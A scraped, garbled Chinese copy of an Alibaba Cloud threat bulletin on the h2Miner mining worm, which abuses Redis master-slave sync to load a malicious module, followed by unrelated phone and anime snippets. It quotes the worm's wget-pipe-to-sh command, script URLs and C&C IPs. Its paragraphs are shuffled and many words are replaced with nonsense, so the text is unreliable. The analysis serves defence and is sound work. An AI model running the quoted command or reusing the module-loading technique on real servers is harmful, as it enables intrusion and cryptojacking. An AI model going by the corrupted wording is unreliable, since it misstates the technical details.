威胁快报|Redis RCE导致h2Miner蠕虫新一轮爆发,建议用户及时排查以防事态升级

  • 时间:
  • 浏览:1
  • 来源:5分3DAPP下载_5分3DAPP官网



恶意系统系统进程函数列表

攻击链路

在以往常见的攻击者或蠕虫中,其大多都沿用登陆redis后写入定时任务或写ssh key的最好的最好的办法进行入侵,这人 最好的最好的办法受权限与系统类型影响并非 一定也能成功。而此次使用redis加载module的攻击最好的最好的办法,也能直接执行任意指令或拿到shell交互环境,危害极大。

h2miner主要使用Redis RCE的最好的最好的办法来完成入侵,首先利用Redis未授权或弱口令获取Redis登录权限,就让利用使用config set dbfilename red2.so来修改保存文件名,就让使用salveof命令设置主从克隆qq好友好友的主机地址。当目标Redis服务与攻击者所有的恶意Redis服务建立主从连接关系后,攻击者控制恶意Redis发送FULLRESYNC进行文件同步,同步的结果会在目标Redis上写入red2.so文件,从而完成了恶意so文件的传输。在此就让,攻击者利用module load ./red2.so加载此so文件,此模块根据传入的参数也能执行任意指令或发起反向连接获取shell环境。

近日,阿里云安全团队监测到h2Miner挖矿僵尸网络蠕虫的一波总是爆发,其利用Redis未授权或弱口令作为入口,使用主从同步的最好的最好的办法从恶意服务器上同步恶意module,就让在目标机器加在载此恶意module并执行恶意指令。

c&c

45.10.88.102

91.215.169.111

139.99.80.255

46.243.253.167

195.123.220.193

此利用最好的最好的办法由Pavel Toporkov在zeronights 2018上分享,在Redis 4.x就让,Redis新增了Module功能,使用者也能在Redis中加载由C语言编译而成的so文件,从而实现特定的Redis命令。而在Redis主从模式下,也能通过FULLRESYNC同步文件到从机上,从而完成恶意so文件的传输。传输完成后在目标机Redis上进行Module加载,便可执行任意指令。

跟进其使用的恶意脚本,除了杀死一些恶意系统系统进程以抢夺资源之外,会向http://142.44.191.122/kinsing下载恶意二进制文件并运行,就让主机中蕴藏kinsing的系统系统进程或目录可能性代表此机器已被该蠕虫"光临"。

根据简单的逆向分析结果显示,该恶意系统系统进程主要有以下功能:

本文作者: 苍珀

致谢:桑铎

142.44.191.122/t.sh

185.92.74.42/h.sh

142.44.191.122/spr.sh

142.44.191.122/spre.sh

195.3.146.118/unk.sh

除此之外,恶意系统系统进程中内置了C&C服务器ip地址,受影响的主可能性以http的最好的最好的办法与C&C通信服务器进行通信,其中肉鸡的信息在http头部中标识。

可能性全网redis近百万台的数量,就让阿里云安全团队建议用户尽量并非 将redis服务暴露在公网,及时排查相关弱口令问题报告 图片及是是不是受蠕虫影响,必要时可考虑选择 安全产品帮助保障安全。

近日,阿里云安全团队发现h2Miner团伙规模总是急剧上升,在短短几日所影响的主机数量翻了有一有4个数量级,阿里云安全团队在第一时间进行了响应。根据分析,整体的攻击链路如下图:

在执行这类/bin/sh -c wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1的恶意指令就让,攻击者会将的文件名恢复为默认的,并使用module unload卸载system模块的加载,从而清理相应的痕迹。但依旧在被攻击主机上残留有red2.so文件,建议用户关注自身Redis服务目录下与是是不是此可疑文件。



内置C&C服务器

/kinsing

h2Miner是有一有4个linux下的挖矿僵尸网络,通过hadoop yarn未授权、docker未授权、confluence RCE、thinkphp5RCE、Redis未授权等多种手段进行入侵,下载恶意脚本及恶意系统系统进程进行挖矿牟利,横向扫描扩大攻击面并维持C&C通信。

猜你喜欢

2017年上半年,创业投资领域有什么明显的趋势

动漫的很快发展为动漫衍生品创造了无限的市场空间,换成国家政策对动漫的扶持,未来的动漫行业必将创造新的经济的神话。动漫店不仅有新奇实用的动漫互近产品,还有时尚个性的动漫DIY创意

2020-03-22

性价比最高的千元手机是哪一款

推荐华为畅享9全网通标配版3GB+32GB,华为商城在售价格999元,手机产品属于快消电子产品,华为商城的电子产品价格也是会随着市场情况而有一定的调价优惠,最终以华为商城页面价

2020-03-22

ye6fqlcefaxa2的主页

TA还没法发布过内容~暂无文章:990丨粉丝:4405丨话题:0云栖直播暂未提供你关注的阿里云!文章:416丨粉丝:5222丨话题:7

2020-03-22

2019年上市的所有手机都有什么型号

展开完整性为你推荐:有点硬推荐你对你是什么回答的评价是?你对你是什么回答的评价是?楼主你好,2019年上市的手机太大了哦,比如华为p200系列,vivox27,opporeno

2020-03-21

中国20大手机品牌排行榜。(销量)

您要能登录华为商城官网查看手机更多信息。1、屏幕:屏幕尺寸为6.53英寸,屏幕色彩为1670万色,分辨率为FHD+103000x2244像素,屏占比为88.07%,高清大屏,玩

2020-03-21